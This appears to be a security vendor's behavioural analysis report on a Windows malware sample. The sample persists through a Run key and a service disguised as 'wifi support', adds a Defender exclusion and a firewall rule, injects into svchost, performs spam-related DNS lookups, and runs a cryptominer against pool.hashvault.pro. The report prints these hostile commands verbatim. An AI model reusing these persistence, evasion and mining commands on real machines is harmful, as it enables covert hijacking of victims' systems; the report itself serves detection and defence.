Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'xrhewuun' = '"%HOMEPATH%\eyypajac.exe"'
Creates the following services
- [<HKLM>\System\CurrentControlSet\Services\uoebtrrk] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\uoebtrrk] 'ImagePath' = '%WINDIR%\SysWOW64\uoebtrrk\tgspivak.exe /d"<Full path to file>"'
- [<HKLM>\System\CurrentControlSet\Services\uoebtrrk] 'ImagePath' = '%WINDIR%\SysWOW64\uoebtrrk\neahyxbf.exe /d"%HOMEPATH%\eyypajac.exe"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\uoebtrrk] 'ImagePath' = '%WINDIR%\SysWOW64\uoebtrrk\neahyxbf.exe'
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\uoebtrrk' = '00000000'
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
- %WINDIR%\syswow64\svchost.exe
Modifies file system
Creates the following files
- %TEMP%\tgspivak.exe
- %HOMEPATH%\eyypajac.exe
- %TEMP%\neahyxbf.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Deletes the following files
- %HOMEPATH%\eyypajac.exe
Moves the following files
- from %TEMP%\tgspivak.exe to %WINDIR%\syswow64\uoebtrrk\tgspivak.exe
- from %TEMP%\neahyxbf.exe to %WINDIR%\syswow64\uoebtrrk\neahyxbf.exe
Network activity
Connects to
- 'mt##.##0.yahoodns.net':25
TCP
HTTP GET requests
- http://www.google.com/
UDP
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK di###way.com
- DNS ASK a3#####03.direcpc.com
- DNS ASK ti#.it
- DNS ASK sm##.tin.it
- DNS ASK al###aurea.it
- DNS ASK aspmx.l.google.com
- DNS ASK ho##ail.com
- DNS ASK ho#########.olc.protection.outlook.com
- DNS ASK ai#.com
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK ex######n.frc.utn.edu.ar
- DNS ASK et###.#ail.tiscali.it
- DNS ASK ti##ali.it
- DNS ASK ho###il.co.uk
- DNS ASK eu#.###.#rotection.outlook.com
- DNS ASK ms#.com
- DNS ASK ms#####.##c.protection.outlook.com
- DNS ASK google.com
- DNS ASK ip##fo.io
- DNS ASK co######4.frc.utn.edu.ar
- DNS ASK ti###linet.it
- DNS ASK mx.##.#tinternet.com
- DNS ASK bt###ernet.com
- DNS ASK mx##.1and1.fr
- DNS ASK ya##o.com
- DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK 19#.###.#11.95.bl.spamcop.net
- DNS ASK so##del.it
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK so########.mail.protection.outlook.com
- DNS ASK ya###.com.ar
- DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK po##.#ashvault.pro
- DNS ASK gm#.de
- DNS ASK mx##.#mig.gmx.net
- DNS ASK gm##l.com
- DNS ASK gmail-smtp-in.l.google.com
- DNS ASK un##ib.it
- DNS ASK ALT1.ASPMX.L.GOOGLE.COM
- DNS ASK bm##.com
- DNS ASK pr####2.bmts.com
- DNS ASK ch#####xdemeures.com
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK na##r.com
- DNS ASK mx#.#aver.com
Miscellaneous
Creates and executes the following
- '%HOMEPATH%\eyypajac.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\uoebtrrk\neahyxbf.exe' /d"%HOMEPATH%\eyypajac.exe"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\uoebtrrk\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\tgspivak.exe" %WINDIR%\SysWOW64\uoebtrrk\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create uoebtrrk binPath= "%WINDIR%\SysWOW64\uoebtrrk\tgspivak.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description uoebtrrk "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start uoebtrrk' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\neahyxbf.exe" %WINDIR%\SysWOW64\uoebtrrk\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' config uoebtrrk binPath= "%WINDIR%\SysWOW64\uoebtrrk\neahyxbf.exe /d\"%HOMEPATH%\eyypajac.exe\""' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\uoebtrrk\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\tgspivak.exe" %WINDIR%\SysWOW64\uoebtrrk\
- '%WINDIR%\syswow64\sc.exe' create uoebtrrk binPath= "%WINDIR%\SysWOW64\uoebtrrk\tgspivak.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description uoebtrrk "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start uoebtrrk
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\neahyxbf.exe" %WINDIR%\SysWOW64\uoebtrrk\
- '%WINDIR%\syswow64\sc.exe' config uoebtrrk binPath= "%WINDIR%\SysWOW64\uoebtrrk\neahyxbf.exe /d\"%HOMEPATH%\eyypajac.exe\""
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' --algo=cn-heavy/xhv -o pool.hashvault.pro:80 -u hvs1hBH2qRhZkKfQyujRfXN4wmUM8hM4VQnhn9xUM6NVgAcdnA3dUBh7qqFx38kZTVEbU3tD3jr2aFXwFtwyj3is7hGGAcW1EH.5000 -p с -k
